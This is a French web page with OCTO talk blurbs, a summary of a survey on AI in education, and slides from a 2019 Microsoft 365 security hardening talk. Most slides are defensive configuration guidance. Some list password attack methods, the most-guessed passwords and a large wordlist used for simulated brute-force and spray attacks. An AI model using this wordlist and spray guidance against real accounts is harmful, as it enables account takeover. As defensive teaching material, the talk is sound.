Les équipes infrastructure, sécurité, production, ou cloud, doivent consacrer du temps à la modernisation de leurs outils (automatisation, cloud, etc) et de leurs pratiques (DevOps, SRE, etc). Dans le même temps, elles doivent répondre à une avalanche croissante de demandes, tout en maintenant un niveau de qualité de service optimal.
Habitué des environnements développeurs, les transformations agiles négligent les particularités des équipes OPS. Lors de ce comptoir, nous vous partagerons notre proposition de valeur de l'agilité@OPS, qui embarquera vos équipes OPS en Classe Business (Agility), et leur fera dire : "nous ne reviendrons pas en arrière".
Le Comptoir OCTO - Qu’apporte l’analyse de cycle de vie lors d’un audit d’éco...OCTO Technology
Par Nicolas Bordier (Consultant numérique responsable @OCTO Technology) et Alaric Rougnon-Glasson (Sustainable Tech Consultant @OCTO Technology)
Sur un exemple très concret d’audit d’éco-conception de l’outil de bilan carbone C’Bilan développé par ICDC (Caisse des dépôts et consignations) nous allons expliquer en quoi l’ACV (analyse de cycle de vie) a été déterminante pour identifier les pistes d’actions pour réduire jusqu'à 82% de l’empreinte environnementale du service.
Vidéo Youtube : https://www.youtube.com/watch?v=7R8oL2P_DkU
Compte-rendu :
Ouvrez la porte ou prenez un mur (Agile Tour Genève 2024)Laurent Speyser
(Conférence dessinée)
Vous êtes certainement à l’origine, ou impliqué, dans un changement au sein de votre organisation. Et peut être que cela ne se passe pas aussi bien qu’attendu…
Depuis plusieurs années, je fais régulièrement le constat de l’échec de l’adoption de l’Agilité, et plus globalement de grands changements, dans les organisations. Je vais tenter de vous expliquer pourquoi ils suscitent peu d'adhésion, peu d’engagement, et ils ne tiennent pas dans le temps.
Heureusement, il existe un autre chemin. Pour l'emprunter il s'agira de cultiver l'invitation, l'intelligence collective , la mécanique des jeux, les rites de passages, .... afin que l'agilité prenne racine.
Vous repartirez de cette conférence en ayant pris du recul sur le changement tel qu‘il est généralement opéré aujourd’hui, et en ayant découvert (ou redécouvert) le seul guide valable à suivre, à mon sens, pour un changement authentique, durable, et respectueux des individus! Et en bonus, 2 ou 3 trucs pratiques!
OCTO TALKS : 4 Tech Trends du Software Engineering.pdfOCTO Technology
En cette année 2024 qui s’annonce sous le signe de la complexité, avec :
- L’explosion de la Gen AI
-Un contexte socio-économique sous tensions
- De forts enjeux sur le Sustainable et la régulation IT
- Une archipélisation des lieux de travail post-Covid
Découvrez les Tech trends incontournables pour délivrer vos produits stratégiques.
L'IA connaît une croissance rapide et son intégration dans le domaine éducatif soulève de nombreuses questions. Aujourd'hui, nous explorerons comment les étudiants utilisent l'IA, les perceptions des enseignants à ce sujet, et les mesures possibles pour encadrer ces usages.
Constat Actuel
L'IA est de plus en plus présente dans notre quotidien, y compris dans l'éducation. Certaines universités, comme Science Po en janvier 2023, ont interdit l'utilisation de l'IA, tandis que d'autres, comme l'Université de Prague, la considèrent comme du plagiat. Cette diversité de positions souligne la nécessité urgente d'une réponse institutionnelle pour encadrer ces usages et prévenir les risques de triche et de plagiat.
Enquête Nationale
Pour mieux comprendre ces dynamiques, une enquête nationale intitulée "L'IA dans l'enseignement" a été réalisée. Les auteurs de cette enquête sont Le Sphynx (sondage) et Compilatio (fraude académique). Elle a été diffusée dans les universités de Lyon et d'Aix-Marseille entre le 21 juin et le 15 août 2023, touchant 1242 enseignants et 4443 étudiants. Les questionnaires, conçus pour étudier les usages de l'IA et les représentations de ces usages, abordaient des thèmes comme les craintes, les opportunités et l'acceptabilité.
Résultats de l'Enquête
Les résultats montrent que 55 % des étudiants utilisent l'IA de manière occasionnelle ou fréquente, contre 34 % des enseignants. Cependant, 88 % des enseignants pensent que leurs étudiants utilisent l'IA, ce qui pourrait indiquer une surestimation des usages. Les usages identifiés incluent la recherche d'informations et la rédaction de textes, bien que ces réponses ne puissent pas être cumulées dans les choix proposés.
Analyse Critique
Une analyse plus approfondie révèle que les enseignants peinent à percevoir les bénéfices de l'IA pour l'apprentissage, contrairement aux étudiants. La question de savoir si l'IA améliore les notes sans développer les compétences reste débattue. Est-ce un dopage académique ou une opportunité pour un apprentissage plus efficace ?
Acceptabilité et Éthique
L'enquête révèle que beaucoup d'étudiants jugent acceptable d'utiliser l'IA pour rédiger leurs devoirs, et même un quart des enseignants partagent cet avis. Cela pose des questions éthiques cruciales : copier-coller est-il tricher ? Utiliser l'IA sous supervision ou pour des traductions est-il acceptable ? La réponse n'est pas simple et nécessite un débat ouvert.
Propositions et Solutions
Pour encadrer ces usages, plusieurs solutions sont proposées. Plutôt que d'interdire l'IA, il est suggéré de fixer des règles pour une utilisation responsable. Des innovations pédagogiques peuvent également être explorées, comme la création de situations de concurrence professionnelle ou l'utilisation de détecteurs d'IA.
Conclusion
En conclusion, bien que l'étude présente des limites, elle souligne un besoin urgent de régulation. Une charte institutionnelle pourrait fournir un cadre pour une utilisation éthique.
7. S
Power Plateform
Power BI Power Apps Power Automate
Office Pro Plus
Word PowerPoint Excel Notes
Office 365 (suite)
Autres
Forms Stream
Guillaume Mathieu & @SP_twit #MWCP19
8. Enterprise Mobility + Security
G Guillaume Mathieu & @SP_twit #MWCP19
• Azure Active Directory Premium
• Azure MFA
• Azure Advanced Protection
• Microsoft Cloud App Security
• Azure Information Protection Premium
• Azure Right Management Premium
• Intune
15. Sécurité (France)
G Guillaume Mathieu & @SP_twit #MWCP19
280 jours : délais pour détecter une attaque
63 jours : délais pour s’en remettre
20 minutes (NotPetya) : 2000 machines, 100 serveurs, sauvegardes HS
81 % : les entreprises Françaises ciblées par une attaque informatique (probablement plus).
35 % : source de l’incident de sécurité, l’équipe IT
800000 euros : prix (moyenne) pour s’en remettre
16. Au programme aujourd’hui
G Guillaume Mathieu & @SP_twit #MWCP19
• Arnaque au président
• Attaque brute force
• Contournement du MFA
• Fuite de données
• Abus de privilèges
• Vol/perte de terminal
• Cryptolocker
• Suivi
• Et Microsoft?
18. Simuler une attaque avec Office 365 Attack Simulator
G Guillaume Mathieu & @SP_twit #MWCP19
19. Le cocktail SPF, DMARC, DKIM
• SPF -> Origine
• vérification IP/domaine envoie du mail (déclaration DNS)
• Configuré par défaut si 100% Online
v=spf1 include:spf.protection.outlook.com -all
• Admin centrale tenant > Configurer > Domaine
• Voir https://docs.microsoft.com/fr-fr/microsoft-365/security/office-365-
security/set-up-spf-in-office-365-to-help-prevent-spoofing
Guillaume Mathieu & @SP_twit #MWCP19S
20. Le cocktail SPF, DMARC, DKIM
• DKIM -> Intégrité
• signature du mail (clé publique dans le DNS du domaine)
Déclarer les CNAME dans Admin tenant >
Configurer > Domaines
avec pour les noms d’hôte (Ajout CNAME)
selector1._domainkey
selector2._domainkey
Guillaume Mathieu & @SP_twit #MWCP19
#Depuis le Microsoft Exchange Online Powershell module
PS > Connect-EXOPSSession #Connexion Exchange Online Pshell Module
PS > Get-DkimSigningConfig -Identity <custom domain> | fl Selector1CNAME,
Selector2CNAME
PS > Set-DkimSigningConfig -Identity
<custom domain> -Enabled $true
S
21. Le cocktail SPF, DMARC, DKIM
• DMARC -> Vérification du « Friendly-from » ie MailFrom(5321) = From(5322)
• définition du comportement en cas d’échec SPF et DKIM
• Déjà géré sur les mails entrants
• Pour les mails sortants, modification du DNS (Ajout « TXT »):
• Rien faire: _dmarc.<domaine> 3600 IN TXT "v=DMARC1;
p=none"
• Mise en quarantaine : _dmarc.<domaine> 3600 IN TXT
"v=DMARC1; p=quarantine"
• Rejet : _dmarc.<domaine> 3600 IN TXT "v=DMARC1;
p=reject"
S
22. Exchange Online Protection (EOP)
• Fonctionnalité inclue dans O365. Add-on pour Exchange On-Premise
• Mails entrants:
• Filtre
• Antivirus
• Policies check
• Anti Spam
• Si ATP, ATP
• Delivery
S Guillaume Mathieu & @SP_twit #MWCP19
24. Office 365 ATP – Safe Links
G Guillaume Mathieu & @SP_twit #MWCP19
25. Office 365 ATP – Safe Links
G Guillaume Mathieu & @SP_twit #MWCP19
• Retour d’expérience
• Réécriture d’URL → attention aux
campagnes marketing de la société !
https://fra01.safelinks.protection.outlook.com/?url=https
%3A%2F%2Fleblogosd.wuibaille.fr%2F&data=02%7C01%7
Cmelanie.mathieu%40flexi.msreport.fr%7C7faf54252d0f4
d687ded08d77b04f4b0%7C2e609e7429a14af3b552f9ee8
23c868a%7C1%7C0%7C637113133514350121&sdata=ne
XyaMJSEbmWlgB7NaBnyYDspzHJcfnqPg7ezB1h%2B08%3
D&reserved=0
• Possibilité d’interdire URL / autoriser des
URL sans inspection
• Astuce : faire un clic droit puis Copy link
address dans le navigateur
• A activer progressivement.
27. Anti phishing avec Office 365 ATP
• Protection contre l’usurpation de domaine ou mails en particulier
• Définition de stratégies Centre de sécurité > Gestion des menaces >
Stratégie
• Protection d’adresse usurpables (max 60)
• Possibilité d’activer du ML (boite intelligente) pour améliorer le
filtrage
Guillaume Mathieu & @SP_twit #MWCP19S
28. Anti phishing avec Office 365 ATP
• Retour d’expérience :
• 30 minutes pour s’appliquer
• On indique les boîtes aux
lettres sensibles dont
l'identité peut être usurpée.
On ne sélectionne pas les
BAL qui doivent être
protégées !
• Les boîtes aux lettres
sensibles peuvent être
internes ou externes.
Guillaume Mathieu & @SP_twit #MWCP19G
29. Office 365 ATP – Safe attachments
G Guillaume Mathieu & @SP_twit #MWCP19
30. Audit de config ATP avec ORCA
• Office 365 Advanced Threat Protection Recommended Configuration
Analyzer (ORCA) – Recommandation des devs et experts MS
• Voir aussi
https://docs.microsoft.com/
en-us/microsoft-365/security/
office-365-security/
recommended-settings-for-eop-
and-office365-atp
Guillaume Mathieu & @SP_twit #MWCP19
PS > Install-Module -Name ORCA #Dans Pshell avec admin rights
PS > Get-ORCAReport #Dans Exchange Online Powershell Module
S
31. En résumé
• Sans EMS :
• SFP, DKIM, DMARC
• Filtrage par défaut avec EOP
• Possibilité de définir des strategies
• Avec EMS
• Safe Links
• Safe Attachments
• Protection domaines et BAL avec ATP
Guillaume Mathieu & @SP_twit #MWCP19
33. Attaquer un mot de passe
• Password spray
• Brute force
• Achat de base utilisateurs (62% des utilisateurs réutilisent)
• Phishing
• Keylog
• Mdp écrits
• Extorsion
S Guillaume Mathieu & @SP_twit #MWCP19
34. Simuler une attaque Spray/Brute Force (O365 E5)
• Here are the top 10 we are seeing in guessing attacks on our system:
• 123456
• password
• 000000
• 1qaz2wsx
• a123456
• abc123
• abcd1234
• 1234qwer
• qwe123
• 123qwe
S Guillaume Mathieu & @SP_twit #MWCP19
35. Simuler une attaque Spray/Brute Force (O365 E5)
• Retours d’expériences :
• Fichier avec 10 millions de mot de passe : 8,13 Mo
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/C
ommon-Credentials/10-million-password-list-top-1000000.txt
• La cible doit avoir une boîte aux lettres Office 365
• Hard Return entre les lignes (pas de SHIFT + entrée)
• Taille du fichier avec les mots de passe : 10 Mo
En pratique, fonctionne uniquement avec un petit nombre de mots de passe.
• Lent
• Documentation : https://docs.microsoft.com/en-us/microsoft-
365/security/office-365-security/attack-simulator#brute-force-password-attack
Guillaume Mathieu & @SP_twit #MWCP19SG
36. Le SSPR (Self Service Password Reset)
• Utilisateur In Cloud :
• Changement du mot de passe
Azure AD uniquement.
• Licence Office 365 ou Azure
Free.
• Changement du mot de passe
via My Account
https://account.activedirectory
.windowsazure.com/ChangePa
ssword.aspx
S Guillaume Mathieu & @SP_twit #MWCP19G
37. Le SSPR (Self Service Password Reset)
• Utilisateur synchronisé :
• Licence Azure AD Premium P1 requise
• Définir son profil SSPR : http://aka.ms/ssprsetup
• Réinitialisation du mot de passe : http://aka.ms/sspr ou My Account
(https://account.activedirectory.windowsazure.com/ChangePassword.aspx)
• Durée de vie minimale du mot de passe AD : 0 jour
S Guillaume Mathieu & @SP_twit #MWCP19G
38. Le SSPR (Self Service Password Reset)
• Utilisateur synchronisé (suite) :
• Azure AD Connect configuré pour le Write Back des mots de passe.
• Stratégie de mot de passe AD = stratégie de mot de passe Azure AD
• Stratégie de mots de passe Azure AD → ignoré pour un compte synchronisé
Option à activer au niveau du Tenant Azure AD :
Set-ADSyncAADCompanyFeature -ForcePasswordResetOnLogonFeature $True
-ConnectorName msreportacademy.onmicrosoft.com -AAD
• Option Azure AD Connect : activer synchroniser « Password must be changed
at next logon »
Set-MsolDirSyncFeature -Feature
EnforceCloudPasswordPolicyForPasswordSyncedUsers
S Guillaume Mathieu & @SP_twit #MWCP19G
39. Azure AD Password Protection
S Guillaume Mathieu & @SP_twit #MWCP19G
40. Azure AD Password Protection
• Déploiement
• https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-
password-ban-bad-on-premises-deploy
• Agent à déployer sur tous les contrôleurs de domaine (Passfit.dll)
• Les DC n’ont pas besoin d’avoir un accès Internet.
• Retours d’expériences :
• Licences Azure AD Premium P1, P2 sauf pour les comptes Cloud Only sans liste de
mot de passe interdit.
• Maximum 1000 mots de passe interdits personnalisés. L’outil prend en charge les
variantes de mots de passe.
• Liste de mots de passe interdits = liste globale générée via Azure AD Identity
Protection + liste personnalisée.
• Incompatible avec l’agent Azure AD Application Proxy.
S Guillaume Mathieu & @SP_twit #MWCP19G
41. Azure AD Password Protection
S Guillaume Mathieu & @SP_twit #MWCP19G
42. Preview : l’utilisateur vérifie lui-même ses données de connexion
Guillaume Mathieu & @SP_twit #MWCP19
Via le portail : https://mysignins.microsoft.com ou https://myprofile.microsoft.com/
S
43. Preview : l’utilisateur vérifie lui-même ses données de connexion
Guillaume Mathieu & @SP_twit #MWCP19
Via le portail Azure AD (https://portal.azure.com) dans le contexte d’un compte standard
S
44. AD Smart Lock / IP Smart Lock
• Si AD : Fonctionne uniquement si les Hash sont synchronisés dans le Cloud
• Par défaut: verrouillage de 60 secondes après 10 tentatives KO
• Activation par https://aad.portal.azure.com/ > Sécurité
S Guillaume Mathieu & @SP_twit #MWCP19
45. AD Smart Lock / IP Smart Lock
• Retours d’expériences :
• Même problématique que le verrouillage des comptes AD.
• Peut être détourné pour faire une attaque de type dénie de service si les
seuils de verrouillage de comptes sont trop bas ou si la durée de verrouillage
est trop importante.
Guillaume Mathieu & @SP_twit #MWCP19G
46. MFA « simple »
• Inclus avec Office 365
• Configurer le cache de
session / méthode
d’authentification.
• Conditionnal Access avec
ADFS : Skip multi-factor
authentication for
requests from federated
Users
• Garder un compte
admin sans MFA (Glass
breaker) avec mot de
passe aléatoire de 20
caractères minimum.
S Guillaume Mathieu & @SP_twit #MWCP19G
47. #General : PowerShell sur Microsoft 365
Guillaume Mathieu & @SP_twit #MWCP19
#Ajout de la PowerSehll Gallery en zone de confiance
PS > Set-PSRepository -Name PSGallery -InstallationPolicy Trusted
PS > Install-Module MSOnline #O365
PS > Install-Module AzureAD –Repository PSGallery #Azure AD
PS > Install-Module Microsoft.Online.SharePoint.PowerShell #SharePoint
PS > Install-Module MicrosoftTeams #Teams
S
• Retour d’expériences :
• 1 module PowerShell pour tous les services Office 365.
• 2 modules PowerShell pour Azure : MsOnline et AzureAD.
Les 2 sont complémentaires.
• Nouveau module PowerShell pour Exchange (pour authentification moderne /
MFA).
G
48. #General : Powershell sur Microsoft 365
• Installer le module PowerShell Exchange Online V1 (solution 1) :
• Utiliser le lien depuis Exchange Online Admin Center | hybrid.
Utiliser Internet Explorer comme navigateur pour le téléchargement !
Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession
#Connexion Exchange Online
PS > Connect-IPPSSession
#Connexion centre de Sécurité
et Conformité
S
49. #General : PowerShell sur Microsoft 365
• Installer le module Exchange Online V2 (solution 2) :
• Suivre la procédure Microsoft :
https://docs.microsoft.com/en-us/powershell/exchange/exchange-
online/exchange-online-powershell-v2/exchange-online-powershell-
v2?view=exchange-ps
Fermer PowerShell après installation forcée de PowerShellGet.
Guillaume Mathieu & @SP_twit #MWCP19
PS > Install-Module PowershellGet -Force #Installation POwerShell Get
PS > Set-ExecutionPolicy RemoteSigned
PS > Install-Module -Name ExchangeOnlineManagement #Installation du module
Exchange V2
PS > Connect-ExchangeOnline #Connexion Exchange Online
S
50. Activation ADAL
• Activé par défaut uniquement sur les tenants récents.
• Prérequis pour le MFA avec les clients lourd (Outlook, Word, Excel…)
• Plus besoin de ressaisir le mot de passe dans Outlook en mode fédéré
(ADFS…).
• Prérequis pour désactiver les anciens (Legacy) protocoles d’authentification
Exchange Online.
Guillaume Mathieu & @SP_twit #MWCP19S
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > Set-OrganizationConfig -OAuth2ClientProfileEnabled $true #30 minutes
to apply
PS > Get-OrganizationConfig | Format-Table Name,OAuth* -Auto
#Vérification
51. Désactivation des protocoles « Legacy »
S Guillaume Mathieu & @SP_twit #MWCP19
Microsoft désactivera les
protocoles d’authentification
basiques (sauf SMTP) dés
Octobre 2020
Protocol / service Paramètre (pour les Policies)
Exchange Active Sync (EAS) AllowBasicAuthActiveSync
Autodiscover AllowBasicAuthAutodiscover
IMAP4 AllowBasicAuthImap
MAPI over HTTP (MAPI/HTTP) AllowBasicAuthMapi
Offline Address Book (OAB) AllowBasicAuthOfflineAddressBook
Outlook Service AllowBasicAuthOutlookService
POP3 AllowBasicAuthPop
Reporting Web Services AllowBasicAuthReportingWebServices
Outlook Anywhere (RPC over HTTP) AllowBasicAuthRpc
Authenticated SMTP AllowBasicAuthSmtp
Exchange Web Services (EWS) AllowBasicAuthWebServices
PowerShell AllowBasicAuthPowerShell
53. Désactivation des protocoles « legacy »
S
Guillaume Mathieu & @SP_twit #MWCP19
• Désactivation par stratégie
PS > New-AuthenticationPolicy –Name "Strict no basic auth" #enable ADAL before!
PS > New-AuthenticationPolicy -Name "Allow Outlook Desktop" -AllowBasicAuthImap -
AllowBasicAuthWebServices #if I need to run Outlook without Modern Auth
PS > Set-User -Identity mwcpdemo01@contoso.com -AuthenticationPolicy "Strict no basic
auth“ #Apply at user level (for test and exceptions)
PS > Set-User -Identity mwcpdemo01@contoso.com -STSRefreshTokensValidFrom
$([System.DateTime]::UtcNow) #force to apply policy under 30 minutes (/24 hours)
PS > Set-User -Identity mwcpdemo01@contoso.com -AuthenticationPolicy $null #Clear
user policy
PS > Set-OrganizationConfig -DefaultAuthenticationPolicy "Strict no basic auth"
#Apply at org level
54. Désactivation des protocoles « legacy »
S Guillaume Mathieu & @SP_twit #MWCP19
• Désactivation par accès conditionnel :
• Nécessite Aure AD Premium P1
55. Désactivation des protocoles « legacy »
S Guillaume Mathieu & @SP_twit #MWCP19
• Désactivation par stratégie d’accès conditionnel :
• Nécessite Aure AD Premium P1
• Azure AD > Accès conditionnel > Stratégie > Baseline policy: End User protection
• S’applique à tout le Tenant -> pour les environnements complexes, utiliser une
stratégie personnalisée !
56. Activation des logs Exchange Online
• Activé par défaut
• Nécessite O365 E5 pour voir l’audit depuis le centre de sécurité et
conformité https://protection.office.com/unifiedauditlog
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > Get-OrganizationConfig | Format-List AuditDisabled #False is OK
57. Activation des logs O365
• Désactivé par défaut
• Centre Sécurité et Conformité
> Rechercher > Rechercher
dans le journal d’audit
• Conservation 90 jours
• Extension à 365 jours
à venir 12/2019 pour
comptes E5 (#56794)
S Guillaume Mathieu & @SP_twit #MWCP19
PS > Connect-EXOPSSession #Exchange Online Powershell module
PS > Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $true
58. MFA selon règle d’accès conditionnel
• Réduire le nombre de demandes MFA.
• Licences Azure AD Premium P1 ou Azure AD Premium P2 (pour Sign Risk)
• Assignations à des utilisateurs, groupes, rôles (Preview)
• Définition de conditions et de règles d’accès.
G
59. MFA selon règle d’accès conditionnel
• Retours d’expérience :
• Désactiver le MFA pour tous les utilisateurs au niveau d’Azure MFA → conflit
avec les règles d’accès conditionnels dans le cas contraire.
Attack Simulator : créer un compte dédié pour cette action car Azure MFA doit
être activé !
• Condition Sign Risks → s’appuie sur Azure AD Identity Protection.
• Impacts potentiels si utilisation des règles par défaut (pas de ciblage).
• Scénarios à privilégier / implémenter :
• MFA uniquement pour les machines non gérées (licence Azure AD P1)
Nécessite de configurer les machines Windows en mode Hybride Join.
• MFA sur détection de risques (licences Azure AD P2)
G Guillaume Mathieu & @SP_twit #MWCP19
60. MFA pour les machines non gérées
• Les types de périphériques Azure AD :
• Azure registred (workplace join)
• Azure AD Join : machine jointe à Azure Active Directory
• AD Domain Join : machine jointe à un domaine Active Directory
• Hybrid Join : machine jointe à un domaine Active Directory avec synchronisation du compte
ordinateur sous forme d’un MSolDevice.
Nécessite une configuration spécifique d’Azure AD Connect.
G
61. MFA pour les machines non gérées
G
• Configuration de la machine :
• Une machine ne
peut pas être à la
fois Azure AD
Domain Join et AD
join !
62. MFA pour les machines non gérées
G
• Spécificités machines Azure AD Join :
• Pour des donner des
permissions à un compte
Azure AD :
• Impossible via l’interface
graphique
• Nécessite ICACLS :
icacls "C:yourpath" /t
/grant azureadFirstLast:M
63. MFA pour les machines non gérées
G
• Configuration Hybride Join via Azure AD Connect
64. MFA en cas de détection de risque
• Retour d’expériences :
• Licences Azure AD Premium P2 requise.
• S’appuie sur Azure AD Identity Protection.
• Simulation : utilisation de Tor Browser avec le compte
melanie.bertrand@flexi.msreport.fr
G
65. Azure AD comme IDP
• Objectifs
• Provisionner automatiquement les applications SaaS.
• Réduire le nombre de login / mot de passe. Azure AD va jouer le rôle d’IDP
(comme ADFS, Ping Federate).
• Quelques définitions :
• IdP : Identity Provider (l’Azure AD IDP)
• SP : Service Provider (le service pour lequel l’utilisateur veut se connecter)
• SCIM (System for Cross Domain Identity Management) : permet de créer, modifier
et supprimer les identités des applications SaaS.
• SAML (Security assertion markup language) : protocole de fédération d’identité
G
67. En résumé
• Activer la librairie ADAL pour Exchange Online / SharePoint Online et bloquer
les anciens protocoles (POP, IMAP…)
• Sans EMS
• Mots de passe complexes et MFA (accès conditionnel basique si ADFS).
• Analyse de logs Exchange et O365
• Réduire le nombre de logins / mots de passe (Azure AD comme IDP).
Maximum 10 applications au niveau du Tenant Azure AD / Office 365
• Avec EMS
• SSPR
• MFA selon emplacement géographique, applications, risques, machine
gérée ou non.
• Liste personnalisée de mots de passe interdits.
• Azure Identity protection protège contre les attaques.
• Réduire le nombre de logins / mots de passe (Azure AD comme IDP)
Pas de limite dans le nombre d’applications.
Guillaume Mathieu & @SP_twit #MWCP19
74. Le PasswordLess
G
• Quelques protocoles à connaître :
• OATH (Initiative for Open Authentication) : groupe de collaboration
international qui vise à promouvoir l’authentification forte en open-
source.
• OTP : One Time Password
• TOTP : Time based One Time Password
Google Authenticator et Microsoft Authenticatior utilisent le protocole
TOTP
• FIDO 2 (Fast Identity Online) :
Basé sur les protocoles Client to Authenticator Protocol (CTAP) et W3C
WebAuthn.
76. PasswordLess avec Authenticator
• Coté utilisateur, aller sur https://aka.ms/mysecurityinfo pour
paramétrer Authenticator (nécessite l’enregistrement du téléphone)
• Ne résout pas les attaques MitM
S Guillaume Mathieu & @SP_twit #MWCP19
78. Authentification par SMS
• Pour les « ForstLine Workers », possibilité d’authentification sans mot
de passe, directement par envoie de SMS
S Guillaume Mathieu & @SP_twit #MWCP19
79. En résumé
• MFA n’est pas 100% sûr
• Tenir les antivirus à jour pour éviter les movement latéraux
• Avec EMS
• Bloquer le phishing initial avec Office 365 ATP
• Filtrer les pays si possible
• Passwordless en 2020
Guillaume Mathieu & @SP_twit #MWCP19
82. La menace intérieure
S Guillaume Mathieu & @SP_twit #MWCP19
Source : Haystax Insider threat report 2019
83. Protection des données / RMS
• IRM sur O365 (à partir de licence E3)
• Faire porter les permissions définies au
niveau de SharePoint sur le document.
• Système de clef publique/clef privé et
un chiffrement des documents à la
volée (clés publiques RSA 2048 bits, et
SHA-256 pour les signtaures)
• Lire https://docs.microsoft.com/fr-fr/information-protection/understand-explore/how-does-it-work
• Système cassable dés lors qu’on a les droits en View Only https://github.com/RUB-NDS/MS-RMS-Attacks
S Guillaume Mathieu & @SP_twit #MWCP19
85. Etiquettes de confidentialités
• Office 365 E3 requis
• Disponible in Outlook, SharePoint, OWA and O365 Pro Plus clients
@SP_twit #aOSKL
86. Etiquettes de confidentialités - Effets
• Chiffrement des fichiers
-> Impossible à ouvrir pour les utilisateurs non autorisés
/ non authentifiés
• Restriction des permissions
-> Désactivation du copier-coller, impression, capture
d’écran, transfert de mails , etc.
• Watermarking
-> sur les fichiers Word
• Bloquage de la copie sur clef USB / PJ sur services non O365
-> RequiereWIP (Windows Information Protection) et
Intune
@SP_twit #aOSKL
87. Création d’étiquettes de confidentialité
• En tant qu’admin de tenant, section
« Sécurité et conformité »
• Dans le centre de sécurité et conformité,
aller dans « Classification » >
« Etiquettes de confidentialité »
• Cliquer sur « Créer une étiquette »
@SP_twit #aOSKL
88. Publication d’étiquettes de confidentialité
• Dans le centre de sécurité et conformité, aller dans « Classification »
> « Etiquettes de confidentialité »
• Cliquer sur « Stratégie des étiquettes»
@SP_twit #aOSKL
89. Nouveauté à venir sur les Labels
• Etiquettes disponibles dans tous les clients (Web ou Pro Plus)
• Support des fonctionnalités Search, OWA, co-édition et eDiscovery
pour les documents chiffrés
• Association d’étiquette de confidentialité aux
Teams/GroupeO365/Sites
• Support des PDF protégés
dans Edge
S Guillaume Mathieu & @SP_twit #MWCP19
90. Application automatique d’étiquettes avec les DLP
• Office 365 E5 requis
• Data Loss Prevention
• Basé sur des expressions régulières
(RegEx) ou dictionnaires
• Peut aussi provoquer des
avertissements ou des blocages de
fichiers
• Compter 7 jours après publication
pour l’application automatique
S Guillaume Mathieu & @SP_twit #MWCP19
91. Application automatique d’étiquettes avec les DLP
• Intune requis
• Bloque la copie sur
périphériques non
autorisés et envoi vers
services non reconnus
• Config:
• Créer/publier les étiquettes
• Config Microsoft Defender
ATP
• Créer une stratégie WIP
avec Intune ou SCCM
S Guillaume Mathieu & @SP_twit #MWCP19
92. Label Auto Apply
• Détection désormais en temps réel lors de la saisie dans Office Pro
Plus
• Application du label ou recommandation d’appliquer
S Guillaume Mathieu & @SP_twit #MWCP19
93. Trainable classifiers
• Application des étiquettes par Machine Learning
• Utilisation des critères existants ou création de critères propres
(50 à 500 contenus pour apprendre et 10.000 pour les tests).
S Guillaume Mathieu & @SP_twit #MWCP19
94. Insider Risk Management
• Détection des comportements anormaux dans la durée des
utilisateurs
• API Graph + Playbooks configurables + Machine Learning
S Guillaume Mathieu & @SP_twit #MWCP19
95. Gestion des extérieurs
• Activable /OneDrive / SiteCollections /Teams
• Possibilité de restreindre à des domaines
• Possibilité de MFA pour les extérieurs (attribution de licences Azure
AD Premium P1 + Azure MFA) via Azure AD ou Conditional Access.
(Non testé avec OTP?)
S Guillaume Mathieu & @SP_twit #MWCP19
96. Utilisateurs extérieurs – Liens anonymes
• A désactiver !
• Gestion globale via Central Admin SharePoint > Stratégies > Partage
S Guillaume Mathieu & @SP_twit #MWCP19
97. Utilisateurs extérieurs – Liens anonymes
• Gestion des SharePoint (et Teams) depuis la central admin SharePoint
> Sites > Sites Actifs > <site> > partage externe
S Guillaume Mathieu & @SP_twit #MWCP19
98. Utilisateurs extérieurs – Liens anonymes
• Gestion des OneDrive depuis la central admin du tenant > Utilisateurs
> Utilisateurs Actifs > <user> > Gérer le partage externe
S Guillaume Mathieu & @SP_twit #MWCP19
99. Obtenir les IP des accès anonymes
Script de Tony Redmond sur https://www.petri.com/tracking-
anonymous-access-sharepoint-onedrive-documents
S Guillaume Mathieu & @SP_twit #MWCP19
100. Annonces pour la gestion des extérieurs
• Bloquer le partage en lien anonymes des fichiers sensibles
• Bloquer le téléchargement des fichiers dans les liens anonymes pour
tous les formats supportés par OWA
• Limiter dans le temps les accès aux
utilisateurs externes authentifiés
S Guillaume Mathieu & @SP_twit #MWCP19
101. Désactivation du transfert automatique de mails
• Dans Exchange Online Powershell Module
G Guillaume Mathieu & @SP_twit #MWCP19
<# Efface les forward existants #>
PS > $AllForwards = Get-Mailbox -ResultSize Unlimited -Filter
{(RecipientTypeDetails -ne "DiscoveryMailbox") -and
((ForwardingSmtpAddress -ne $null) -or (ForwardingAddress -ne $null))} |
Select Identity
PS > $AllForwards | % {Set-Mailbox -Identity $_.Identity -
ForwardingSmtpAddress $null -ForwardingAddress $null}
<# Desactive la possibilité de créer des forwards #>
PS > Set-RemoteDomain Default -AutoForwardEnabled $false
102. Le CASB avec Cloud App Security
• Licence EMS E5 requise
• Permet l’analyse des logs pare feu / proxy pour détecter les
applications SaaS non autorisées.
• Portail : https://portal.cloudappsecurity.com/
Guillaume Mathieu & @SP_twit #MWCP19S
103. MIM 2016
• MIM 2016 est une suite de produits :
• MIM Synchronisation Service : moteur de synchronisation avec de nombreux
connecteurs
• MIM portal + MIM Services + MIMWALL : moteur de workflow, portail web
• BHOLD : remplacé par Azure AD Access Review
• MIM 2016 Certificate Management : gestion des certificats
• PAM : gestion des comptes à fort privilèges
• Azure AD Connect est une version dérivée de MIM Service et MIM
Synchronisation Service
• MIM Synchronization Service ne nécessite pas l’achat de licences !
https://social.technet.microsoft.com/wiki/contents/articles/2487.ho
w-to-license-fim-2010-and-mim-2016.aspx
G Guillaume Mathieu & @SP_twit #MWCP19
104. MIM 2016
G
Management Agent : connecteur MIM Synchronization Service (AD, SQL, fichier texte, LDAP…).
Connecteur space : copie en lecture seule du contenu d’un connecteur (AD, SQL…).
Import : le contenu du système cible est copié dans le connecteur space.
Export : le contenu du connecteur space est copié dans le système cible.
105. MIM 2016
• Les actions effectuées lors d’une FULL Synchronization :
• Filter/Delete : les objets filtrés sont chargés dans le connecteur space du Management
Agent (pas dans la Metaverse).
• Join : permet d’associer un objet du connecteur space avec un objet de la Metaverse selon
une règle de jointure.
Exemple : ExtensionAttribute1 du connecteur space AD = EmployeeID de la Metaverse)
• Projection : création d’une entrée dans la Metaverse à partir d’un objet d’un connecteur
space.
